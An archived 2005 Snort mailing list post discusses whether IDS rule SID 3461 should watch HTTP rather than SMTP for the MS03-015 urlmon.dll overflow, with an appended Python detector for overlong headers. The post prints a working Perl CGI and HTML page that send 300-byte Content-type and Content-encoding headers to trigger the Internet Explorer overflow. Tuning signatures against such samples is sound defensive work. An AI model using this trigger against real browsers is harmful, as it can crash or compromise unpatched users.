Snort mailing list archives
SMTP Content-Type overflow attempt SID 3461
From: "Craig Mueller" <cmueller () alebra com>
Date: Mon, 26 Sep 2005 09:58:11 -0500
I've seen the following alert triggered:

    [**] [1:3461:2] SMTP Content-Type overflow attempt [**]
    [Classification: Attempted Administrator Privilege Gain] [Priority: 1]
    09/25-11:11:06.816693 x.y.z.1:35499 -> 192.168.1.10:25
    TCP TTL:240 TOS:0x10 ID:0 IpLen:20 DgmLen:2776
    ***AP*** Seq: 0xCE9CF6A4 Ack: 0xDEEA2DBD Win: 0x40B0 TcpLen: 20
    [Xref => http://www.microsoft.com/technet/security/bulletin/MS03-015.mspx]
    [Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2003-0113]
    [Xref => http://www.securityfocus.com/bid/7419]

Yet the Microsoft fix is for Internet Explorer, while the signature looks for traffic on TCP port 25. I think the signature should look for this exploit on TCP port 80.
Attached is the sample exploit, which would also only affect port 80.

    #!/usr/bin/perl
    #
    # Name this file as "urlmon-bo.cgi"
    #
    # Emits an HTTP response whose Content-type and Content-encoding header
    # values are 300 bytes long (the MS03-015 urlmon.dll condition).
    use strict;
    use warnings;

    my $LONG = "A" x 300;
    print "Content-type: $LONG\r\n";
    print "Content-encoding: $LONG\r\n";
    print "\r\n";

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8- -

    <html>
    <body>
    <img src="urlmon-bo.cgi">
    </body>
    </html>

--
Craig Mueller CISSP
Senior Consultant
Alebra Technologies
www.alebra.com
612-436-8204
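The poster's point is that the condition worth alerting on is an overlong Content-Type / Content-Encoding header in an HTTP response, not SMTP traffic. The following is an added example, not code from the original post or from the Snort project, that does on the HTTP side what such a rule would do: it parses the header block of a response and flags watched headers whose value exceeds a length limit. The 256-byte limit, the header names watched and the two sample responses are assumptions constructed for this example; the first sample is what a web server would send for the CGI above.

```python
"""Flag overlong Content-Type / Content-Encoding values in HTTP responses.

Added example (not from the original post or from Snort). The 256-byte limit
below is an assumed threshold for this example, not a value taken from the
SID 3461 rule.
"""
from typing import List, Tuple

WATCHED_HEADERS = ("content-type", "content-encoding")
MAX_HEADER_VALUE_LEN = 256  # assumed threshold for this example


def parse_headers(raw: bytes) -> List[Tuple[str, str]]:
    """Split the header block of an HTTP message into (name, value) pairs.

    Only the bytes before the first blank line are examined; the body is
    ignored. Header names are lower-cased so that "Content-type" and
    "Content-Type" compare equal. Lines without a colon (including any
    obs-fold continuation lines) are skipped rather than merged, so a folded
    header cannot be used to split a long value across two short lines
    unnoticed: the first line still carries the bulk of the value.
    """
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:  # lines[0] is the status line
        if b":" not in line:
            continue
        name, value = line.split(b":", 1)
        headers.append((name.strip().decode("latin-1").lower(),
                        value.strip().decode("latin-1")))
    return headers


def find_overlong_headers(raw: bytes,
                          limit: int = MAX_HEADER_VALUE_LEN) -> List[Tuple[str, int]]:
    """Return (header-name, value-length) for watched headers longer than limit."""
    findings = []
    for name, value in parse_headers(raw):
        if name in WATCHED_HEADERS and len(value) > limit:
            findings.append((name, len(value)))
    return findings


# Constructed sample: the response a web server emits for the posted CGI.
SUSPICIOUS_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    + b"Server: example\r\n"
    + b"Content-type: " + b"A" * 300 + b"\r\n"
    + b"Content-encoding: " + b"A" * 300 + b"\r\n"
    + b"\r\n"
)

# Constructed sample: an ordinary response that must not alert.
BENIGN_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    + b"Content-Type: text/html; charset=utf-8\r\n"
    + b"Content-Length: 5\r\n"
    + b"\r\n"
    + b"hello"
)


if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS_RESPONSE),
                          ("benign", BENIGN_RESPONSE)):
        print(label, find_overlong_headers(sample))
```

The check keys on the header value length alone, which is what makes it independent of the transport port: pointed at port 80 traffic it matches the CGI's output, while a normal `text/html; charset=utf-8` value stays well under the limit.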
Current thread:
- SMTP Content-Type overflow attempt SID 3461 Craig Mueller (Sep 26)
- Re: SMTP Content-Type overflow attempt SID 3461 Alex Kirk (Sep 26)